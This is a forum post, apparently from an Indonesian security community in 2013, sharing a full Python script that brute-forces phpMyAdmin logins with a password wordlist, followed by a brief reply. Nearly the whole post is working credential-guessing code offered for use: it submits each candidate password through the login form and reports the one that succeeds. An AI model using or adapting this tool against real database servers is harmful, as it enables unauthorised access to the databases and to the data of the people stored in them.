New Tool for indonesianbacktrack - simple phpmyadmin dict attack
#12
(01-10-2013, 02:36 AM)mywisdom Wrote: New Tool for indonesianbacktrack - simple phpmyadmin dictionary attack

download url : /tools/phpmyadmin_dict_attack.py


Code:
#!/usr/bin/python
#a very simple phpmyadmin dictionary attack tool
#requirement : mechanize and cookielib
#by: Antonius (www.indonesianbacktrack.or.id - www.cr0security.com - #www.codewall-security.com  )
import sys, re
try:
    import mechanize,cookielib
except Exception, err:
    print "\tSorry ! Please install this python module : mechanize and cookielib before using this ! "
    sys.exit(1);

def banner():
    print_liner_fix_width_with_terminal()
    print "\tPhpMyAdmin Dictionary Attack Tool"
    print "\tsimple code by : Antonius"
    print "\twww.cr0security.com - www.codewall-security.com - www.indonesianbacktrack.or.id"
    print_liner_fix_width_with_terminal()

def usage():
    example = "\tExample : " + sys.argv[0] + " http://127.0.0.1/phpmyadmin root passwords.txt"
    print "\tUsage : " + sys.argv[0] + " <url> <username> <wordlist> <options>"
    print "\tOptions : \n\t\t -v : verbose \n\t\t -t : use multithreading"
    print example
    print example + " -v"
    print example + " -t"
    print example + " -t -v\n"
    
def read_dictionary(dict):
    print "[+] Using password list : " + dict
    try:
        fd = open(dict)
    except:
        print "\tSorry failed to open " + dict
        sys.exit(1)
    content = fd.readline()
    x = 0
    LList = []
    while (content != ""):
        content.replace( "\n", "" )
        content = fd.readline()
        content=content.strip()
        LList.append(1)
        LList[x] = content
        x = x + 1
    print "[+] Loaded total : " + str(x) + " words"
    return LList

def  phpmyadmin_login(url, username, passwd):
    print "[+] trying : " + username + ", password : " + passwd
    br = mechanize.Browser()
    cj = cookielib.LWPCookieJar()
    br.set_cookiejar(cj)
    br.set_handle_equiv(True)
    br.set_handle_redirect(True)
    br.set_handle_referer(True)
    br.set_handle_robots(False)
    br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=3)
    br.addheaders = [('User-agent', 'Mozilla/5.0')]
    try:
        br.open(url)
    except Exception, err:
        print "failed"
    br.select_form(name='login_form')
    br.find_control("server").readonly = False
    br.find_control("lang").readonly = False
    br.find_control("convcharset").readonly = False
    br["server"] = "1"
    #hanya untuk phpmyadmin berbahasa inggris
    br["lang"] = "en-utf-8"
    br["convcharset"] = "iso-8859-1"
    br["pma_username"] = username
    br["pma_password"] = passwd
    br.method = "POST"
    br.action = url
    br.submit()
    login_res = br.response().read()
    return login_res

#def getTerminalSize taken from /questions/566746/how-to-get-console-window-width-in-python (using ioctl)
def getTerminalSize():
    import os
    env = os.environ
    def ioctl_GWINSZ(fd):
        try:
            import fcntl, termios, struct, os
            cr = struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ,'1234'))
        except:
            return
        return cr
    cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
    if not cr:
        try:
            fd = os.open(os.ctermid(), os.O_RDONLY)
            cr = ioctl_GWINSZ(fd)
            os.close(fd)
        except:
            pass
    if not cr:
        cr = (env.get('LINES', 25), env.get('COLUMNS', 80))
    return int(cr[1]), int(cr[0])

def print_liner_fix_width_with_terminal():
    liner = ""    
    s = getTerminalSize()  
    width = s[0]
    for i in range (0, width):
        liner = liner + "="
    print liner

def main():    
    banner()
    if len(sys.argv) < 4:
        usage()
        sys.exit(1)
    for arg in sys.argv:
        try:
            url = sys.argv[1]
            login = sys.argv[2]
            dictionary= sys.argv[3]
        except Exception, err:
            usage()
            sys.exit(1)
    print "[+] Starting dictionary attack at url : " + url
    print "[+] Using login : " + login
    print_liner_fix_width_with_terminal()
    DList = read_dictionary(dictionary)
    x = len(DList)
    for word in DList:
        if len(word) > 1:
            result = phpmyadmin_login(url, login, word)
            if re.search("#1045", result):
                print "[-] Login Failed:",word
            else:
                print "[+] Found login : " + login + " and Password : " + word
                sys.exit(1)
                
if __name__ == "__main__":
    main()

python module requirement : mechanize, cookielib
and password lists

klo di wedus gk bisa d pake ya om ?


Messages In This Thread
RE: New Tool for indonesianbacktrack - simple phpmyadmin dict attack - by greenhorn - 01-10-2013, 03:06 PM



Users browsing this thread: 1 Guest(s)